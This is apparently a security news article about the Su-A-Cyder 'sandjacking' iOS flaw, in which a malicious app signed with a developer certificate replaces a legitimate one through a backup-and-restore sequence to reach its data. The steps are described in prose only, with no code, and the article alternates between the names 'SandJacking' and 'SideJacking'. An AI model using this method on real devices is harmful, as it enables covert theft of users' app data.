The iOS app vulnerability Apple still hasn't fixed

Share

We get inside the tale of the iOS app vulnerability that Apple knows about but hasn’t patched yet. Are you sitting comfortably? Then we’ll begin.

Once upon a time there was a gallant researcher who found a vulnerability with iOS devices, reported it to Apple who fixed it, found they hadn’t fixed it properly so reported it again and, some six months later, is still waiting for that fix to appear. Welcome to the strange case of the Su-A-Cyder sandjack attack.

To get to grips with sandjacking you first need to understand sandboxing, specifically the Apple iOS sandbox. It is here where every iOS application must run, and must do so to prevent other processes from accessing it or any data that is associated with it.

As you can imagine, Apple has put rather a lot of effort into protecting the sandbox from those who would compromise it and the data it can contain. Although that’s not to say those who like to break things haven’t been skimping on their efforts to do the opposite of course.

The walled garden approach taken by Apple has also been pretty successful in keeping the Japanese Knotweed out of the iOS application flower bed, it has to be said. Which is hardly surprising given that all apps from the App Store have to be signed with a certificate that requires a relatively strict authentication procedure to obtain. The idea being that malware authors will find it easier to go jump on the begonias in someone else’s garden and leave the Apple one alone.

If an attacker has physical access to any target device then it’s game over

You will note the use of terms such as ‘pretty successful’ and ‘relatively strict’ or ‘the idea being’ which have all been very deliberately chosen; there is no such thing as 100% secure, and that includes Apple’s walled app garden. Here at IT Security Thing we have looked at how, in the recent past, determined threat actors have managed to infiltrate that garden using weaponised application development software for example. And XCodeGhost is just one example of why resting on your laurels is not an option in the security space, even the Apple one.

If further evidence of how any weakness can be exploited given enough time, money and determination then you need look no further than the sandjacking threat.

A researcher from Mi3 Security, Chilik Tamir, has demonstrated how it’s perfectly possible to ‘SandJack’ malware onto a non-jailbroken iOS device courtesy of Xcode 7 which enables a developer to create apps not destined for the App Store using easy to get hold of certificates. Two things should immediately leap out at the security-minded here: firstly there’s the easy to get hold of bit.

How easy? How does by providing an Apple ID strike you? OK, so an email address is required as well, but we all know they are easier to fake than a parliamentary expenses claim (and that’s pretty damn easy.)

Secondly, these easy to get certs are for apps not destined to be uploaded to the App Store, so the final product won’t even get the protection offered by the Apple application review process.

In mitigation, such apps that don’t undergo the full verification process have some limitations applied: no access to Apple Pay or the passbook, no access to iCloud or the game center, no in-app purchase features and no access to application domains for example.

But that doesn’t mean they cannot be part of a malicious process chain, that they cannot be of use to those with criminal intent. This type of certificated app is perfectly capable of exfiltrating certain data types, accessing the address book, the calendar and so on. What Tamir did was prove this to be the case with his Su-A-Cyder proof of concept that was demonstrated at Black Hat Asia.

Tamir showed how it was possible to replace a legitimate application with a malicious version giving threat actors complete access to the rogue application and its malicious capabilities.

Here at IT Security Thing we always like to look at what we call the RWR factor for such attacks; the Real World Risk. It has to be said that while the Su-A-Cyder tool does present a risk, the RWR factor is actually pretty low. The reason being that the threat actor would need physical access to the target iOS device, including knowledge of its passcode, in order to execute the attack. This doesn’t make it impossible, far from it, but it does mitigate the risk from being a broad one to a very narrow field of attack indeed.

Even narrower when you take into consideration that Apple closed the door on Su-A-Cyder with iOS 8.3 onwards which prevented the installation of any app with a similar bundle ID to an existing one. Apart from the fact that Tamir isn’t the kind of researcher who gives up that easy; he continues to look for weaknesses in supposedly fixed systems as every good researcher does.

And he found one; which is where the sandjacking attack methodology, still applying the Su-A-Cyder tool, comes in. Tamir demonstrated this at Hack-in-the-Box Amsterdam. Like many such vulnerabilities, the route to compromise is actually a lot easier than you might imagine. In this particular case it would seem that Apple was a little lapse in the patching of iOS.

So while the installation process was fixed to prevent the replacement of legit apps with those having a similar bundle ID, Apple appears to have forgotten to fix the back door. Perhaps we should say the ‘back up door’ as Tamir found that the restore process still allowed a Su-A-Cyder approach to work.

No patch has yet to be made available by Apple

Which gets us, at last, to the SideJacking process itself. Simply put, SideJacking can be accomplished by creating a backup of the device and then deleting the target application. You’ve probably got ahead of us now, but yes you then install the malicious version of the app and restore from the previously created backup.

The clever bit, or stupid depending upon your perspective here, is that in restoring that newly created backup the malicious apps does not get removed or replaced with the legitimate one. What does happen, as a result, is that the malicious app now has access (along with the threat actor) to any user data that was associated with the original install.

Mitigating factors remain much the same as before, not least that physical access to the device is still required along with the device passcode. Additionally, the SideJacked application will only provide the threat actor with access to the sandbox of the legit app that it has replaced. This means that every single target application will have to be replaced by a new malicious application. However, given that the device itself is required to be in the physical possession of the attacker this should not prove overly problematical and Tamir envisages the process would be fully automated from start to finish.

No doubt Apple will close the door on this one soon enough, or you’d like to think so at least. In actual fact, Tamir reported the vulnerability in January (having discovered it in December 2015) and it has been confirmed by Apple. No patch has yet to be made available, however, so one wonders how long it will take.

Not that Apple isn’t taking this seriously, but rather we suspect it is just a matter of prioritising fixes. Luckily, in the meantime SideJacking has very limited appeal courtesy of the need to have possession of the target device. As we often say, if an attacker has physical access to any target device then it’s game over. Simple as.

That said, SideJacking is interesting as it exposes some problems with sideways thinking from the iOS patching perspective. Using backup and restore to circumvent the fix should have been on the Apple radar, truth be told.

Whatever, if an attacker was successful, the victim would be hard-pressed to be any the wiser. The target app would appear to be perfectly legitimate in all ways, including full functionality. The only way to identify the installed app as being rogue would involve the app’s certificate and the device’s provisioning settings. Both beyond the ken of the average user.

Share